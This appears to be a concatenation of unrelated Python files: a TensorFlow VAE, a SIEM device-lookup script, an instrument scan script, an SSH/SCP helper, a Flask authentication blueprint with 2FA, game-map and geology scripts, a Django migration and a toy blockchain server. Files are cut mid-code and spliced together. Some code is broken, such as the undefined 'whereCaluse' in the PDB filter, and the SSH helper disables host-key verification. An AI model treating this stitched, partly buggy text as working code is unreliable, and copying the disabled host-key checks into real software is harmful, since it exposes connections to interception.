Use the reparameterisation trick so we can sample while remaining differentiable. """ with tf.name_scope('reparameterise'): z_mean = x[:,:,:,:n] z_stddev = x[:,:,:,n:] e = tf.random_normal(tf.shape(z_mean), stddev=stddev) # TODO log_var or stddev? return z_mean + tf.square(z_stddev)*e def compute_kernel(x, y): """ Compute the distance between x and y using a guassian kernel. """ x_size = tf.shape(x)[0] y_size = tf.shape(y)[0] dim = tf.shape(x)[1] tiled_x = tf.tile(tf.reshape(x, [x_size, 1, dim]), [1, y_size, 1]) tiled_y = tf.tile(tf.reshape(y, [1, y_size, dim]), [x_size, 1, 1]) return tf.exp(-tf.reduce_mean(tf.square(tiled_x - tiled_y), axis=2) / tf.cast(dim, tf.float32)) def compute_mmd(x, y): """ Calculate the maximum mean disrepancy.. """ x_kernel = compute_kernel(x, x) y_kernel = compute_kernel(y, y) xy_kernel = compute_kernel(x, y) return tf.reduce_mean(x_kernel) + tf.reduce_mean(y_kernel) - 2 * tf.reduce_mean(xy_kernel) def gaussian_d(x, y): """ A conceptual lack of understanding here. Do I need a dx to calculate this over? Doesnt make sense for a single point!? """ d = tf.norm(x - y, axis=1) return tf.exp(-0.5*d)/(tf.sqrt(2*tf.constant(np.pi))) def pz(z): """ Estimate p(z) using our prior on z. """ z = tf.layers.flatten(z) return gaussian_d(z , tf.zeros_like(z)) def px_z(x_, y): # the added noise in the hidden layer. return gaussian_d(tf.layers.flatten(y[:,:,:,:1]), tf.layers.flatten(x_)) def pz_x(h, z): # the added noise in the final layer. shape = h.get_shape().as_list() return gaussian_d(tf.layers.flatten(h[:,:,:,:shape[-1]//2]), tf.layers.flatten(z)) def p_bayes(x_, y, h, z): """ If p(z | x) is far away from p(z) then p(x) is low p(x) = p(x | z) p(z) / p(z | x) """ return px_z(x_, y) * pz(z) / pz_x(h, z) # def KL_divergence(p, q): # return tf.reduce_sum(p * tf.log(p/q), axis=-1) # # def bayesian_surprise(z): # """ # # """ # return kl(z, prior) class InfoVAE(): def __init__(self, n_hidden, width, depth, stddev=0.0001): """ Args: """ self.n_hidden = n_hidden self.width = width self.depth = depth self.n_channels = 1 self.stddev = stddev self.construct() def construct(self): """ Constructs: encoder (tf.keras.Model): encode the gradient into the hidden space decoder (tf.keras.Model): decodes a hidden state into an image """ layers = [] layers.append(tf.keras.layers.Conv2D(self.width, 4, strides=(2, 2), padding='same', # input_shape=(28,28,1) )) layers.append(tf.keras.layers.Activation(tf.keras.activations.selu)) for i in range(self.depth): layers.append(tf.keras.layers.Conv2D(self.width, 4, strides=(2, 2), padding='same'),) layers.append(tf.keras.layers.Activation(tf.keras.activations.selu)) layers.append(tf.keras.layers.Conv2D(self.n_hidden*2, 1, strides=(1, 1), padding='same')) self.encoder = tf.keras.Sequential(layers) # decoder layers = [] layers.append(tf.keras.layers.Conv2DTranspose(self.width, 4, strides=(2, 2), padding='same', # input_shape=(1,1,self.n_hidden) )) layers.append(tf.keras.layers.Activation(tf.keras.activations.selu)) for _ in range(self.depth): layers.append(tf.keras.layers.Conv2DTranspose(self.width, 4, strides=(2, 2), padding='same')) layers.append(tf.keras.layers.Activation(tf.keras.activations.selu)) layers.append(tf.keras.layers.Conv2DTranspose(self.n_channels*2, 1, strides=(1, 1), padding='same')) self.decoder = tf.keras.Sequential(layers) def __call__(self, x): """ Args: x (tf.tensor): the input shape is [None, width, height, channels], dtype is tf.float32 """ with tf.name_scope('infovae'): self.h = self.encoder(x) self.z = reparameterise(self.h, 
self.n_hidden, self.stddev) self.y = self.decoder(self.z) self.x_ = reparameterise(self.y, self.n_channels, self.stddev) return self.x_ def make_losses(self, x, y=None): self.x = x if y is None: print('...') y = self.__call__(self.x) with tf.name_scope('loss'): recon_loss = tf.losses.sigmoid_cross_entropy( logits=tf.layers.flatten(y), multi_class_labels=tf.layers.flatten(self.x)) latent_loss = compute_mmd(tf.layers.flatten(self.z), tf.layers.flatten(tf.random_normal(shape=tf.shape(self.z)))) return recon_loss, latent_loss def make_contractive_loss(self): # assumes make_losses has already been called print(self.h, self.x) dhdx = tf.gradients(self.h, self.x)[0] print(dhdx) if dhdx is None: raise ValueError() return tf.reduce_mean(tf.reduce_sum(tf.square(dhdx), axis=[1,2,3])) def estimate_density(self, x): x_ = self.__call__(x) return p_bayes(x_, self.y, self.h, self.z) @staticmethod def preprocess(x): im = np.reshape(x, [-1, 28, 28, 1]) im = np.round(im).astype(np.float32) # NOTE important !? return np.pad(im, [(0,0), (2,2), (2,2), (0,0)], 'constant', constant_values=0) if __name__ == '__main__': tf.enable_eager_execution() x = tf.random_normal((100, 28, 28, 1)) nn = InfoVAE(12, 16, 3) x_ = nn(x) # loss = nn.make_losses(x) assert x_.shape == x.shape #!/usr/local/bin/python3 # Requirements : # - msiempy (https://github.com/mfesiem/msiempy) # - manuf (https://github.com/coolbho3k/manuf) """ Usage example : ./find_dhcp_device.py -t last_hour -v Apple -m Macbook """ import argparse import copy import re import pprint import dateutil import msiempy import msiempy.event from manuf import manuf # DHCP log signature ID DHCP_RENEW = "272-11" # to change depending of your value # RADIUS login log signature ID RADIUS_START = "268-2239707159" # to change depending of your value # Key mapping for hostname and username, SIEM returns weird values... # Not necessary in newer version of the module HostID = "Alert.BIN(4)" UserIDSrc = "Alert.BIN(7)" TEMPLATE_ROW = dict(user="", host="", macaddress="", seen="", ip="") def parse_args(): parser = argparse.ArgumentParser( description="Request logs, aggregate, and print it." 
) parser.add_argument( "--time_range", "-t", metavar="time_range", help="Timerange, choose from " + ", ".join(msiempy.FilteredQueryList.POSSIBLE_TIME_RANGE), required=True, ) parser.add_argument( "-m", "--hostname_must_contains", metavar="Hostname match", nargs="+", default=[], ) parser.add_argument( "-v", "--vendors", metavar="Vendor match", nargs="+", default=[] ) args = parser.parse_args() return args def find(time_range, hostname_must_contains=[], vendors=[]): events = msiempy.event.EventManager( fields=["HostID", "UserIDSrc", "SrcIP", "SrcMac", "DSIDSigID"], time_range=time_range, filters=[ msiempy.event.FieldFilter("Alert.DSIDSigID", [DHCP_RENEW, RADIUS_START]) ], limit=500, ) print("Loading data...") events.load_data(slots=10, workers=5, max_query_depth=2) print("{} events have been loaded from the SIEM".format(len(events))) if len(vendors) > 0: print("Filtering vendors...") mac = manuf.MacParser(update=True) vendor_filtered_events = list() for event in events: device_vendor = mac.get_manuf(event["Alert.SrcMac"]) if device_vendor == None: continue for vendor in vendors: if vendor.lower() in device_vendor.lower(): vendor_filtered_events.append(event) break events = vendor_filtered_events print("{} events matches the vendor(s)".format(len(events))) print("Aggregating events and devices...") devices = aggregate_list_based_on_SrcMac(events) print("{} unique devices in total".format(len(devices))) # Apply host filters host_filtered_devices = list() for dev in devices: if len(hostname_must_contains) == 0 or any( [ match.lower() in dev.get("host").lower() for match in hostname_must_contains ] ): host_filtered_devices.append(dev) if len(devices) > len(host_filtered_devices): devices = host_filtered_devices print("{} devices matches hostname filter(s)".format(len(devices))) return msiempy.NitroList(alist=devices) def aggregate_list_based_on_SrcMac(event_list): new_list = list() nbDevicesAdded = 0 devicesUpdated = set() for event in event_list: found = False for entry in new_list: # if the computer was already there in the database if entry["macaddress"] == event["Alert.SrcMac"]: found = True # Updates the last seen date and IP address # If the event is more recent that the last seen entry date if dateutil.parser.parse( event["Alert.LastTime"] ) > dateutil.parser.parse(entry["seen"]): entry["seen"] = event["Alert.LastTime"] entry["ip"] = event["Alert.SrcIP"] # if the hostname is not empty, the two hostnames are not equals and the event is a dhcp event if ( len(event[HostID]) > 0 and entry["host"] != event[HostID] and (event["Alert.DSIDSigID"] == DHCP_RENEW) ): # Update the hostname entry["host"] = event[HostID] # if the SIEM user field is not empty and the event is a radius login and the username is not already filled in the entry and the field is not a macaddress if ( len(event[UserIDSrc]) > 0 and event["Alert.DSIDSigID"] == RADIUS_START and entry["user"] != event[UserIDSrc] and re.match( r"""[0-9a-f]{2}([-])[0-9a-f]{2}(\1[0-9a-f]{2}){4}$""", event[UserIDSrc], ) is None ): # Update the username entry["user"] = event[UserIDSrc] devicesUpdated.update([event["Alert.SrcMac"]]) if not found: entry = copy.copy(TEMPLATE_ROW) # we cannot trust the host infos from the radius events if event["Alert.DSIDSigID"] != RADIUS_START: entry["host"] = event[HostID] # And we cannot trust the user info from the dhcp events. 
And sometime the user fields is a macaddress actually, so we ignore that elif event["Alert.DSIDSigID"] == RADIUS_START and not re.match( r"""[0-9a-f]{2}([-])[0-9a-f]{2}(\1[0-9a-f]{2}){4}$""", event[UserIDSrc] ): entry["user"] = event[UserIDSrc] entry["seen"] = event["Alert.LastTime"] entry["macaddress"] = event["Alert.SrcMac"] entry["ip"] = event["Alert.SrcIP"] new_list.append(entry) nbDevicesAdded += 1 print("{} devices were added".format(nbDevicesAdded)) print("{} devices were updated".format(len(devicesUpdated))) return new_list # MAIN PROGRAM if __name__ == "__main__": args = parse_args() devices = find( time_range=args.time_range, hostname_must_contains=args.hostname_must_contains, vendors=args.vendors, ) print(devices.get_text()) # move to initial position maw(tx, 0, ty, -4, tz, 0, rz, 0, rx, 0, ry, 0, omega, 0, detarm, 0) pause("Scan t2t 0..1 in steps of 0.1 with count time 2s.") sscan(t2t, 0, .1, 1, 2.0) pause("Move t2t to 0.") maw(t2t, 0) pause("Scan ty -5..5 in steps of 0.5 with count time 1s.") sscan(ty, -5, .5, 5, 1.0) pause("Move ty to 0.") maw(ty, 0) pause("Scan tx -5..5 in steps of 0.5 with count time 1s.") sscan(tx, -5, .5, 5, 1.0) pause("Move tx to 0.") maw(tx, 0) pause("Scan tz -20..20 in steps of 1 with count time 1s.") sscan(tz, -20, 1, 20, 1.0) pause("Move tz to 0.") maw(tz, 0) pause("Scan ry -3..3 in steps of .5 with count time 1s.") sscan(ry, -3, .5, 3, 1.0) pause("Move ry to 0.") maw(ry, 0) pause("Move detarm into guide - emergency stop penetration test.") maw(detarm, -10)import os import sys import shlex import click # CREDIT: https://gist.github.com/bortzmeyer/1284249#gistcomment-3074036 def create_ssh(ip: str, port: str, user: str, debug: bool, cd_folder: str = None, shell: str = 'bash'): """Create a ssh session""" ssh = f'/usr/bin/ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o LogLevel=ERROR -p {port} {user}@{ip}' if cd_folder: ssh = ssh + f' -t "cd {cd_folder}; {shell} --login"' pid = os.fork() if pid == 0: # a child process if debug: print(f"{ssh}") cmd = shlex.split(ssh) os.execv(cmd[0], cmd) os.wait() def do_scp(ip: str, port: str, user: str, src: str, target: str, show: bool, debug: bool): """Create a ssh session""" scp = f'/usr/bin/scp -P {port} -r -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o LogLevel=ERROR {src} {user}@{ip}:{target}' if show: print(scp) return pid = os.fork() if pid == 0: # a child process if debug: print(f"{scp}") cmd = shlex.split(scp) os.execv(cmd[0], cmd) os.wait()# -*- coding: utf-8 -*- import tensorflow as tf class TrainConfig(object): def __init__(self): # the number of step between evaluation self.train_input_size = 1 self.train_data_size = 0.8 self.test_data_size = 0.8 self.training_epochs = 300 self.optimizer = 'adam' self.loss_fn = 'mse' saved_model_folder_path = './saved_model' if not tf.gfile.Exists(saved_model_folder_path): tf.gfile.MakeDirs(saved_model_folder_path) self.save_weight_name= saved_model_folder_path + '/save_weight_1.h5' sbliven/mmtf-pyspark10-100 '''customReportQuery.py This filter runs an SQL query on specified PDB metadata and annotation fields retrived using RCSB PDB RESTful web services. The fields are then queried and the resulting PDB IDs are used to filter the data. The input to the filter consists of an SQL WHERE clause, and list data columns availible from RCSB PDB web services. 
References ---------- - List of supported field names: `reportFiled `_ - Examples of SQL WHERE clauses: `SQL where `_ Examples -------- Find PDB entries with Enzyme classification number 2.7.11.1 and source organism Homo sapiens: >>> pdb = read_full_sequence_files(sc) >>> whereClause = "WHERE ecNo='2.7.11.1' AND source='Homo sapiens'" >>> pdb = pdb.filter(RcsbWebserviceFilter(whereClause, "ecNo","source")) ''' __author__ = "" __maintainer__ = "" __email__ = "" __status__ = "Done" from mmtfPyspark.datasets import customReportService from pyspark.sql import SparkSession class CustomReportQuery(object): '''Filters using an SQL query on the specified fields Attributes ---------- whereClause : str WHERE Clause of SQL statement fields : str, list one or more field names to be used in query ''' def __init__(self, whereClause, fields): # Check if fields are in a list or string if type(fields) == str: if ',' in fields: fields = fields.split(',') else: fields = [fields] # Get requested data columns dataset = customReportService.get_dataset(fields) # Check if the results contain chain level data self.chainLevel = "structureChainId" in dataset.columns # Create a temporary view of the dataset dataset.createOrReplaceTempView("table") # Create SparkSession spark = SparkSession.builder.getOrCreate() # Run SQL query if (self.chainLevel): # For chain level data sql = "SELECT structureChainID, structureId, chainId FROM table " \ + whereClause results = spark.sql(sql) # Add both PDB entry and chain level data, so chain-based data can be filtered self.pdbIds = results.distinct().rdd.map(lambda x: x[0]).collect() self.pdbIds += results.distinct().rdd.map(lambda x: x[1]).collect() else: # For PDB entry level data sql = "SELECT structureId FROM table " + whereCaluse results = spark.sql(sql) self.pdbIds = results.distinct().rdd.map(lambda x: x[0]).collect() self.pdbIds = list(set(self.pdbIds)) def __call__(self, t): match = t[0] in self.pdbIds # If results are PDB IDs, but the keys contains chain names, # Then truncate the chain name before matching (e.g., 4HHB.A -> 4HHB) if (not self.chainLevel) and (not match) and (len(t[0]) > 4): print(t[0]) return t[0][:4] in self.pdbIds return match #!/usr/bin/env python3 """A small set of functions for doing math operations. 
""" # Write a function named add that adds two values def add(a, b): """Function that adds two arguments """ return a + b def sub(a, b): """Function that subtracts two arguments """ return a - b def mult(a, b): """Function that multiplies two arguments """ return a * b def div(a, b): """Function that divides two arguments """ return a / b def intDiv(a, b): """Function that divides two arguments with integer division """ return a // b """""" #################################################################################################### # IMPORTS ################################################################################ IMPORTS # #################################################################################################### # Standard Library import io import json # Installed import flask import werkzeug from dds_web.api.db_connector import DBConnector import flask_login import pyqrcode import pyotp import itsdangerous import sqlalchemy import marshmallow # Own Modules from dds_web import auth from dds_web import forms from dds_web.database import models import dds_web.utils from dds_web import db, limiter import dds_web.api.errors as ddserr from dds_web.api.schemas import user_schemas from dds_web import mail auth_blueprint = flask.Blueprint("auth_blueprint", __name__) #################################################################################################### # ERROR HANDLING ################################################################## ERROR HANDLING # #################################################################################################### @auth_blueprint.errorhandler(werkzeug.exceptions.HTTPException) def bad_request(error): """Handle user deletion errors.""" try: message = error.message except AttributeError: message = "" flask.current_app.logger.error(f"{error.code}: {message}") return flask.make_response(flask.render_template("error.html", message=message), error.code) #################################################################################################### # ENDPOINTS ############################################################################ ENDPOINTS # #################################################################################################### @auth_blueprint.route("/", methods=["GET"]) @flask_login.login_required def index(): """DDS start page.""" # Check if user has 2fa setup if flask_login.current_user.has_2fa: form = forms.LogoutForm() return flask.render_template("index.html", form=form) else: return flask.redirect(flask.url_for("auth_blueprint.two_factor_setup")) @auth_blueprint.route("/confirm_invite/", methods=["GET"]) @limiter.limit( dds_web.utils.rate_limit_from_config, error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def confirm_invite(token): """Confirm invitation.""" s = itsdangerous.URLSafeTimedSerializer(flask.current_app.config.get("SECRET_KEY")) try: # Get email from token email = s.loads(token, salt="email-confirm", max_age=604800) # Get row from invite table invite_row = models.Invite.query.filter(models.Invite.email == email).first() except itsdangerous.exc.SignatureExpired as signerr: db.session.delete(invite_row) db.session.commit() raise # TODO: Do not raise api error here, should fix new error handling for web page except (itsdangerous.exc.BadSignature, itsdangerous.exc.BadTimeSignature) as badsignerr: raise except sqlalchemy.exc.SQLAlchemyError as sqlerr: raise # Check the invite exists if not invite_row: if dds_web.utils.email_in_db(email=email): return 
flask.make_response(flask.render_template("user/userexists.html")) else: raise ddserr.InviteError( message=f"There is no pending invitation for the email adress: {email}" ) # Initiate form form = forms.RegistrationForm() # invite columns: unit_id, email, role flask.current_app.logger.debug(invite_row) # Prefill fields - facility readonly if filled, otherwise disabled form.unit_name.render_kw = {"disabled": True} if invite_row.unit: # backref to unit form.unit_name.data = invite_row.unit.name form.unit_name.render_kw = {"readonly": True} form.email.data = email suggested_username = email.split("@")[0] if dds_web.utils.valid_chars_in_username( suggested_username ) and not dds_web.utils.username_in_db(suggested_username): form.username.data = suggested_username return flask.render_template("user/register.html", form=form) @auth_blueprint.route("/register", methods=["POST"]) @limiter.limit( dds_web.utils.rate_limit_from_config, error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def register(): """Handles the creation of a new user""" form = dds_web.forms.RegistrationForm() # Validate form - validators defined in form class if form.validate_on_submit(): # Create new user row by loading form data into schema try: new_user = user_schemas.NewUserSchema().load(form.data) except marshmallow.ValidationError as valerr: flask.current_app.logger.warning(valerr) raise except (sqlalchemy.exc.SQLAlchemyError, sqlalchemy.exc.IntegrityError) as sqlerr: raise ddserr.DatabaseError from sqlerr # Go to two factor authentication setup # TODO: Change this after email is introduced flask_login.login_user(new_user) return flask.redirect(flask.url_for("auth_blueprint.two_factor_setup")) # Go to registration form return flask.render_template("user/register.html", form=form) @auth_blueprint.route("/login", methods=["GET", "POST"]) @limiter.limit( dds_web.utils.rate_limit_from_config, methods=["POST"], error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def login(): """Log user in with DDS credentials.""" # Redirect to index if user is already authenticated if flask_login.current_user.is_authenticated: if flask_login.current_user.has_2fa: return flask.redirect(flask.url_for("auth_blueprint.index")) return flask.redirect(flask.url_for("auth_blueprint.two_factor_setup")) next = flask.request.args.get("next") # is_safe_url should check if the url is safe for redirects. 
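    # A typical is_safe_url check (implementation not shown here) parses `next`
    # and only accepts http/https URLs whose netloc matches the request host,
    # so the login view cannot be abused as an open redirect.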
if not dds_web.utils.is_safe_url(next): return flask.abort(400) # Check if for is filled in and correctly (post) form = forms.LoginForm() if form.validate_on_submit(): # Get user from database user = models.User.query.get(form.username.data) # Unsuccessful login if not user or not user.verify_password(input_password=form.password.data): flask.flash("Invalid username or password.") return flask.redirect( flask.url_for("auth_blueprint.login", next=next) ) # Try login again # Correct username and password --> log user in flask_login.login_user(user) flask.flash("Logged in successfully.") # Go to home page return flask.redirect(next or flask.url_for("auth_blueprint.index")) # Go to login form (get) return flask.render_template("user/login.html", form=form, next=next) @auth_blueprint.route("/logout", methods=["POST"]) @flask_login.login_required def logout(): """Logout user.""" if flask_login.current_user.is_authenticated: flask_login.logout_user() return flask.redirect(flask.url_for("auth_blueprint.index")) @auth_blueprint.route("/twofactor", methods=["GET"]) @flask_login.login_required def two_factor_setup(): """Setup two factor authentication.""" # since this page contains the sensitive qrcode, make sure the browser # does not cache it if flask_login.current_user.has_2fa: return flask.redirect(flask.url_for("auth_blueprint.index")) return ( flask.render_template( "user/two-factor-setup.html", secret=flask_login.current_user.otp_secret ), 200, { "Cache-Control": "no-cache, no-store, must-revalidate", "Pragma": "no-cache", "Expires": "0", }, ) @auth_blueprint.route("/qrcode", methods=["GET"]) @flask_login.login_required def qrcode(): """Generate qrcode""" if flask_login.current_user.has_2fa: return flask.redirect(flask.url_for("auth_blueprint.index")) # render qrcode for FreeTOTP url = pyqrcode.create(flask_login.current_user.totp_uri()) stream = io.BytesIO() url.svg(stream, scale=5) return ( stream.getvalue(), 200, { "Content-Type": "image/svg+xml", "Cache-Control": "no-cache, no-store, must-revalidate", "Pragma": "no-cache", "Expires": "0", }, ) @auth_blueprint.route("/twofactor/verify", methods=["POST"]) @flask_login.login_required def two_factor_verify(): """Verify two factor authentication.""" otp = int(flask.request.form.get("otp")) if flask_login.current_user.verify_totp(otp): flask.flash("The TOTP 2FA token is valid", "success") # User has now setup 2FA flask_login.current_user.set_2fa_seen() try: db.session.commit() except sqlalchemy.exc.SQLAlchemyError as sqlerr: raise ddserr.DatabaseError from sqlerr return flask.redirect(flask.url_for("auth_blueprint.index")) else: flask.flash("You have supplied an invalid 2FA token!", "danger") return flask.redirect(flask.url_for("auth_blueprint.two_factor_setup")) @auth_blueprint.route("/reset_password", methods=["GET", "POST"]) @limiter.limit( dds_web.utils.rate_limit_from_config, methods=["POST"], error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def request_reset_password(): """Request to reset password when password is lost.""" # Reset forgotten password only allowed if logged out if flask_login.current_user.is_authenticated: return flask.redirect(flask.url_for("auth_blueprint.index")) # Validate form form = forms.RequestResetForm() if form.validate_on_submit(): email = models.Email.query.filter_by(email=form.email.data).first() dds_web.utils.send_reset_email(email_row=email) flask.flash("An email has been sent with instructions to reset your password.", "info") return flask.redirect(flask.url_for("auth_blueprint.login")) 
# Show form return flask.render_template("user/request_reset_password.html", form=form) @auth_blueprint.route("/reset_password/", methods=["GET", "POST"]) @limiter.limit( dds_web.utils.rate_limit_from_config, error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def reset_password(token): """Perform the password reset when password is lost.""" # Go to index page if already logged in if flask_login.current_user.is_authenticated: return flask.redirect(flask.url_for("auth_blueprint.index")) # Verify that the token is valid and contains enough info user = models.User.verify_reset_token(token=token) if not user: flask.flash("That is an invalid or expired token", "warning") return flask.redirect(flask.url_for("auth_blueprint.request_reset_password")) # Get form for reseting password form = forms.ResetPasswordForm() # Validate form if form.validate_on_submit(): user.password = form.password.data db.session.commit() flask.flash("Your password has been updated! You are now able to log in.", "success") return flask.redirect(flask.url_for("auth_blueprint.login")) # Go to form return flask.render_template("user/reset_password.html", form=form) @auth_blueprint.route("/change_password", methods=["GET", "POST"]) @flask_login.login_required def change_password(): """Change password by entering the old password.""" # Validate form form = forms.ChangePasswordForm() if form.validate_on_submit(): # Change password flask_login.current_user.password = form.new_password.data db.session.commit() flask_login.logout_user() flask.flash("You have successfully changed your password.", "success") return flask.redirect(flask.url_for("auth_blueprint.login")) # Show form return flask.render_template("user/change_password.html", form=form) @auth_blueprint.route("/confirm_deletion/", methods=["GET"]) @flask_login.login_required def confirm_self_deletion(token): """Confirm user deletion.""" s = itsdangerous.URLSafeTimedSerializer(flask.current_app.config.get("SECRET_KEY")) try: # Get email from token email = s.loads(token, salt="email-delete", max_age=604800) # Check that the email is registered on the current user: if email not in [email.email for email in flask_login.current_user.emails]: msg = f"The email for user to be deleted is not registered on your account." flask.current_app.logger.warning( f"{msg} email: {email}: user: {flask_login.current_user}" ) raise ddserr.UserDeletionError(message=msg) # Get row from deletion requests table deletion_request_row = models.DeletionRequest.query.filter( models.DeletionRequest.email == email ).first() except itsdangerous.exc.SignatureExpired: db.session.delete( models.DeletionRequest.query.filter(models.DeletionRequest.email == email).all() ) db.session.commit() raise ddserr.UserDeletionError( message=f"Deletion request for {email} has expired. Please login to the DDS and request deletion anew." ) except (itsdangerous.exc.BadSignature, itsdangerous.exc.BadTimeSignature): raise ddserr.UserDeletionError( message=f"Confirmation link is invalid. No action has been performed." 
) except sqlalchemy.exc.SQLAlchemyError as sqlerr: raise ddserr.DatabaseError(message=sqlerr) # Check if the user and the deletion request exists if deletion_request_row: try: user = user_schemas.UserSchema().load({"email": email}) DBConnector.delete_user(user) # remove the deletion request from the database db.session.delete(deletion_request_row) db.session.commit() except sqlalchemy.exc.SQLAlchemyError as sqlerr: raise ddserr.UserDeletionError( message=f"User deletion request for {user.username} / {user.primary_email.email} failed due to database error: {sqlerr}", alt_message=f"Deletion request for user {user.username} registered with {user.primary_email.email} failed for technical reasons. Please contact the unit for technical support!", ) return flask.make_response( flask.render_template("user/userdeleted.html", username=user.username, initial=True) ) else: return flask.make_response( flask.render_template("user/userdeleted.html", username=email, initial=False) ) import _initpath import os import re import collections from PIL import Image import pyradox tree = pyradox.txt.parse_file(os.path.join(pyradox.get_game_directory('EU4'), 'map', 'terrain.txt')) terrain_bmp = Image.open(os.path.join(pyradox.get_game_directory('EU4'), 'map', 'terrain.bmp')) print(terrain_bmp.getpalette()) province_map = pyradox.worldmap.ProvinceMap() colormap = {} for province_id, position in province_map.positions.items(): print(province_id) colormap[province_id] = tuple(terrain_bmp.getpixel(position)) for terrain_type, terrain_data in tree['categories'].items(): if 'color' not in terrain_data: continue color = tuple(terrain_data.find_all('color')) for province_id in terrain_data.find_all('terrain_override'): colormap[province_id] = color out = province_map.generate_image(colormap) out.save('out/terrain_map.png') Loop3D/LoopProjectFile0 import LoopProjectFile as LPF import sys import numpy # Start Main function # Sanity check arguments if len(sys.argv) < 2: print("Usage: python run.py ") quit() else: filename = sys.argv[1] # Create basic Loop Project and add extents for broken hill region LPF.CreateBasic(filename) geodes = [-31.90835,-31.863242,141.493799,141.546666] utm = [54,'S',6469600,6474600,546700,551700] depth = [-1000,-6000] spacing = [100,100,100] LPF.Set(filename,"extents",geodesic=geodes,utm=utm,depth=depth,spacing=spacing) # Check new file is valid and report the version of the file LPF.CheckFileValid(filename, True) resp = LPF.Get(filename,"version") if resp["errorFlag"]: print(resp["errorString"]) else: print(resp["value"]) # Report the extents of the new file resp = LPF.Get(filename,"extents") if resp["errorFlag"]: print(resp["errorString"]) else: extents = resp["value"] print("Geodesic:", extents["geodesic"]) print("UTM: ", extents["utm"]) print("Depth: ", extents["depth"]) print("Spacing: ", extents["spacing"]) # Grab the dummy dataset from the bh Loop Project File with shape (51x51x51) # and add it to this project (required to have the same shape) resp = LPF.Get("bh.loop3d","strModel") if resp["errorFlag"]: print(resp["errorString"]) else: strData = resp["value"] resp2 = LPF.Set(filename,"strModel",data=strData,index=0) if resp2["errorFlag"]: print(resp2["errorString"]) else: print("Data saved in new file") resp3 = LPF.Get(filename,"strModel",index=0) if resp3["errorFlag"]: print(resp3["errorString"]) else: print("Data received again") stratigraphy = numpy.zeros(3,LPF.stratigraphicLayerType) stratigraphy[0] = (1,1.0,1.1,b'Thick One',1000.0,0,0,0,0,0,0) stratigraphy[1] = (2,1.1,1.2,b'Thin 
One',100.0,0,0,0,0,0,0) stratigraphy[2] = (2,1.1,1.2,b'Next One',50.0,0,0,0,0,0,0) LPF.Set(filename,"stratigraphicLog",data=stratigraphy) # Set some dummy observations within the region of interest contacts = numpy.zeros(3,LPF.contactObservationType) contacts[0] = (1,550500.0,6470000.0,0.0) contacts[1] = (2,550500.0,6070000.0,0.0) contacts[2] = (3,500500.0,6070000.0,0.0) LPF.Set(filename,"contacts",data=contacts) LPF.Set(filename,"contactsAppend",data=contacts) # Get the observation data back out to confirm it was saved resp = LPF.Get(filename,"stratigraphicLog") if resp["errorFlag"]: print(resp["errorString"]) else: print(resp["value"]) # Get the observation data back out to confirm it was saved resp = LPF.Get(filename,"contacts",indexRange=(0,7)) if resp["errorFlag"]: print(resp["errorString"]) else: print(resp["value"])contacts/migrations/0007_auto_20150902_2228.py0 # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('contacts', '0006_auto_20150902_2225'), ] operations = [ migrations.AlterField( model_name='adult', name='cellphone', field=models.CharField(max_length=32, null=True, blank=True), ), migrations.AlterField( model_name='adult', name='email', field=models.CharField(max_length=64, null=True, blank=True), ), migrations.AlterField( model_name='adult', name='homephone', field=models.CharField(max_length=32, null=True, blank=True), ), migrations.AlterField( model_name='family', name='email', field=models.CharField(max_length=64, null=True, blank=True), ), ] import random import hashlib, json import requests from urllib.parse import urlparse from textwrap import dedent from uuid import uuid4 from flask import Flask , jsonify , request, render_template, redirect from time import time from flask_cors import CORS port = 0 class Blockchain(): def __init__(self): self.chain = [] self.current_transactions= [] self.nodes = set() #genesis block self.new_block(previous_hash=1, proof=100) def new_block(self, proof , previous_hash=None): block ={ 'index': len(self.chain) + 1 , 'timestamp' : time(), 'transactions': self.current_transactions, 'proof' : proof, 'previous_hash': previous_hash or self.hash(self.chain[-1]) } self.current_transactions=[] self.chain.append(block) return block def new_transaction(self,url , ip): self.current_transactions.append( { 'url': url, 'ip' : ip } ) return self.last_block['index']+1 @staticmethod def hash(block): block_string = json.dumps(block , sort_keys=True).encode() return hashlib.sha256(block_string).hexdigest() @property def last_block(self): return self.chain[-1] def proof_of_work(self , last_proof): proof = 0 while self.valid_proof(last_proof, proof) is False: proof+=1 return proof @staticmethod def valid_proof(last_proof, proof): guess = f'{last_proof}{proof}'.encode() guess_hash = hashlib.sha256(guess).hexdigest() return guess_hash[:5]== '00000' def register_node(self , address, flag): parsed_url = urlparse(address) if parsed_url.netloc != "": if flag == 1: self.trigger_flood_nodes(address) for node in self.nodes: node = "http://" + node requests.post(url=f'http://{parsed_url.netloc}/nodes/register', json={ 'nodes': [node], 'flag': 0 }) self.nodes.add(parsed_url.netloc) def valid_chain(self , chain): last_block = chain[0] for current_index in range(1 , len(chain)): block = chain[current_index] print(f'{last_block}') print(f'{block}') print('\n----------\n') if block['previous_hash']!=self.hash(last_block): return False if not 
self.valid_proof(last_block['proof'] , block['proof']): return False last_block = block else: return True def resolve_conflicts(self): neighbours = self.nodes new_chain = None max_length = len(self.chain) for node in neighbours: response = requests.get(f'http://{node}/chain') if response.status_code ==200: length = response.json()['length'] chain = response.json()['chain'] if length >= max_length and self.valid_chain(chain): max_length = length new_chain = chain if new_chain: self.chain = new_chain return True return False def triggered_flood_chain(self): for node in self.nodes: requests.get(f'http://{node}/nodes/resolve') def trigger_flood_nodes(self,address): for node in self.nodes: requests.post(url=f'http://{node}/nodes/register', json={ 'nodes': [address] , 'flag': 0 }) def redundancy(self,url): for block in self.chain: for i in block['transactions']: if i['url'] == str(url): return True else: return False # Flask API code here app = Flask(__name__) node_identifier = str(uuid4()).replace('-', '') CORS(app) blockchain = Blockchain() @app.route("/") def index(): return render_template("index.html") @app.route('/mine', methods= ['GET']) def mine(): last_block = blockchain.last_block last_proof = last_block['proof'] proof = blockchain.proof_of_work(last_proof) previous_hash = blockchain.hash(last_block) block = blockchain.new_block(proof, previous_hash) with open("data/"+str(port)+"_chain.json", "w") as file: json.dump(blockchain.chain, file) response = { 'message' : "New Block Forged", 'index': block['index'] , 'transactions': block['transactions'], 'proof': block['proof'], 'previous_hash': block['previous_hash'], } 